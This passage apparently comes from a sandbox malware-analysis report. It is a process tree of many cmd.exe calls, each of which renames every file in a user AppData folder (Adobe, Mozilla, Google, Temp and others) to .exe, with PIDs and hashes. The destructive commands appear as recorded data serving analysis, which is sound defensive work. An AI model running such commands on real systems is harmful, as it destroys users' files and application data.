          • cmd.exe (PID: 6368 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Adobe\Acrobat\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5744 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Adobe\AcroCef\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 4220 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Adobe\ARM\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 8168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7648 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Adobe\Color\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 3364 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Adobe\Acrobat\DC\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 5364 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Adobe\Acrobat\DC\Cache\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7472 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Adobe\Acrobat\DC\SOPHIA\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 4204 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Adobe\Acrobat\DC\SOPHIA\Acrobat\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7668 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7348 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Adobe\AcroCef\DC\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 1716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 1200 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7860 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6788 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cookie\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7996 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\blob_storage\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 3808 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Cache\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 3160 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 1520 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7176 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Network\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 1888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5356 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 5404 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\blob_storage\336a045b-df12-4067-9f71-93ee2edb038d\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 7320 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 8116 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 5692 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\wasm\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7472 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 3552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 3856 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\wasm\index-dir\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 1524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 8012 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7328 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Adobe\ARM\{291AA914-A987-4CE9-BD63-0C0A92D435E5}\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7400 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Adobe\ARM\Acrobat_23.006.20320\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7244 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Adobe\ARM\S\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5564 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Adobe\Color\Profiles\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 7996 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Adobe\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5228 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 1252 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\CEF\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7324 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Comms\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5744 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\ConnectedDevicesPlatform\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 4220 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\D3DSCache\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 7560 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5480 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\History\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 8116 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 5704 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Mozilla\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7476 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Packages\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 7232 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\PeerDistRepub\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 1784 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\PlaceholderTileLogoFolder\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6656 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Publishers\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5532 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\SolidDocuments\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7968 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Temp\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6664 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Temporary Internet Files\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5228 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\VirtualStore\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 1252 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Adobe\Acrobat\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 4612 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Adobe\AcroCef\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 2824 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Adobe\ARM\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 5616 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Adobe\Color\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 6104 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7476 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\Cache\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 1084 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\SOPHIA\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 768 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\SOPHIA\Acrobat\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6656 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 3380 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 3596 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 2704 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 3172 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cookie\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 2624 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\blob_storage\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 2892 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Cache\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 2636 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 3944 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6036 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Network\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 4724 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7904 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\blob_storage\336a045b-df12-4067-9f71-93ee2edb038d\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 6120 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7324 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5588 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\wasm\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 7580 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 4276 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\wasm\index-dir\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7224 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 1016 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Adobe\ARM\{291AA914-A987-4CE9-BD63-0C0A92D435E5}\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 4352 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Adobe\ARM\Acrobat_23.006.20320\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 8116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7188 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Adobe\ARM\S\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
